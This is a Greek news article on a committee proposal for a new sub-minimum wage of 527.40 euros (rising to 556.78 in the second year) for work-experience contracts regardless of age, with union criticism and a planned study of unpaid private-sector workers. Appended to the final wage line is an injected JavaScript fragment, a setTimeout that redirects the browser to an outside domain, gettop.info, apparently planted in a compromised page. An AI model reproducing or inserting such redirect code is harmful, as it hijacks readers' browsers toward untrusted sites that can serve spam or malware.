Νέος κατώτατος μισθός – Ποιοι θα παίρνουν 527 ευρώ;

0
6

 

 Σύνδεση της αμοιβής με την εργασιακή εμπειρία θα προταθεί στις διαπραγματεύσεις του υπουργείου Εργασίας με τους Θεσμούς στις 17 Οκτωβρίου, σύμφωνα με την Επιτροπή των ανεξάρτητων εμπειρογνωμόνων για τις αλλαγές στα εργασιακά.

Έτσι, σύμφωνα με την πρόταση της Επιτροπής, θα γίνει αντικατάσταση του νομοθετημένου μισθού των 510,95 ευρώ που ισχύει σήμερα για όλους τους νέους ηλικίας έως 25 ετών από έναν υποκατώτατο μισθό, για την «απόκτηση επαγγελματική εμπειρίας» ανεξαρτήτως ηλικίας, ύψους 527,40 ευρώ (το 90% του κατώτατου των 586,08 ευρώ) τον πρώτο χρόνο και 556,78 ευρώ (το 95% του κατώτατου) τον δεύτερο.

Σύμφωνα με την «Ημερησία», στο τελικό πόρισμα της Επιτροπής, υπογραμμίζεται ότι ο χαμηλότερος μισθός (στο 90% του νομοθετημένου κατώτατου, αντί 85% που προέβλεπε το αρχικό σχέδιο για τον πρώτο χρόνο και στο 95% τον δεύτερο) δεν πρέπει να συνδέεται με την ηλικία γιατί οι περισσότεροι νέοι σπουδάζουν περισσότερα χρόνια ενώ θα διευκολύνει τη μετάβασή τους από την εκπαίδευση στην εργασία.

Αποσυνδέει, ωστόσο, τον μειωμένο αυτό κατώτατο μισθό από τον (χαμηλότερο) μισθό της μαθητείας που ισχύει για εκπαιδευόμενους στις επιχειρήσεις σπουδαστές.

Στελέχη της ΓΣΕΕ και εργατολόγοι επισημαίνουν ότι στην Ελλάδα δεν υπάρχει σαφές κανονιστικό πλαίσιο για τη σύμβαση απόκτησης εργασιακής εμπειρίας, πολλές φορές συμβάσεις μαθητείας υποκρύπτουν την παροχή εξαρτημένης εργασίας ενώ μπορεί να συμφωνηθεί ότι ο εργοδότης θα καταβάλλει στον μαθητευόμενο μισθό κατώτερο από τον μισθό του καταρτισμένου μισθωτού για την ωφέλεια που αντλεί από την εργασία του τελευταίου ή ακόμη και να μην λάβει καθόλου μισθό.

Επιπλέον, μετά το 2012 και τη νομοθέτηση του χαμηλότερου μισθού για τους νέους ηλικίας έως 25 ετών, πολλές προσλήψεις έγιναν με καθεστώς μερικής απασχόλησης, δηλαδή με ακόμη χαμηλότερες αποδοχές για τη συμπίεση του κόστους εργασίας.

Στο 1 εκατ. οι απλήρωτοι

Παράλληλα με τη διαπραγμάτευση για την επαναρρύθμιση των εργασιακών σχέσεων , των συμβάσεων και των κατώτατων ορίων των μισθών, η ηγεσία του υπουργείου Εργασίας αναθέτει μελέτη για την καταγραφή και την αντιμετώπιση του φαινομένου των «εγκλωβισμένων» και των απλήρωτων μισθωτών του ιδιωτικού τομέα που υπολογίζεται ότι ξεπερνούν το 1 εκατ.

Ανακοίνωσε συνοπτικό μειοδοτικό διαγωνισμό για την επιλογή αναδόχου ο οποίος θα εξετάσει τις επιπτώσεις από τις πτωχεύσεις επιχειρήσεων, τις επισχέσεις εργασίας, την απλήρωτη για 1 ? 6 μήνες εργασία κ.ά. Η μελέτη θα προτείνει και πλαίσιο πολιτικής τόσο για την αποτροπή της δημιουργίας τέτοιων καταστάσεων όσο και για δράσεις που θα βοηθήσουν τον απεγκλωβισμό των εργαζομένων, σύμφωνα με την προκήρυξη, όπως σημειώνει το δημοσίευμα της «Ημερησίας».

ΟΙ ΚΑΤΩΤΑΤΟΙ ΜΙΣΘΟΙ

586,08 ευρώ ο νομοθετημένος μισθός άγαμου υπαλλήλου με 0 – 3 χρόνια εργασίας

510,95 ευρώ ο νομοθετημένος μισθός άγαμου υπαλλήλου ηλικίας μέχρι 25 ετών με 0 – 3 χρόνια εργασίας

527,40 ευρώ τον πρώτο χρόνο και 556,78 ευρώ τον δεύτερο χρόνο για την απόκτηση επαγγελματικής εμπειρίας, ανεξαρτήτως ηλικίας (πρόταση της Επιτροπής Εμπειρογνωμόνων για τις αλλαγές στα εργασιακά) setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here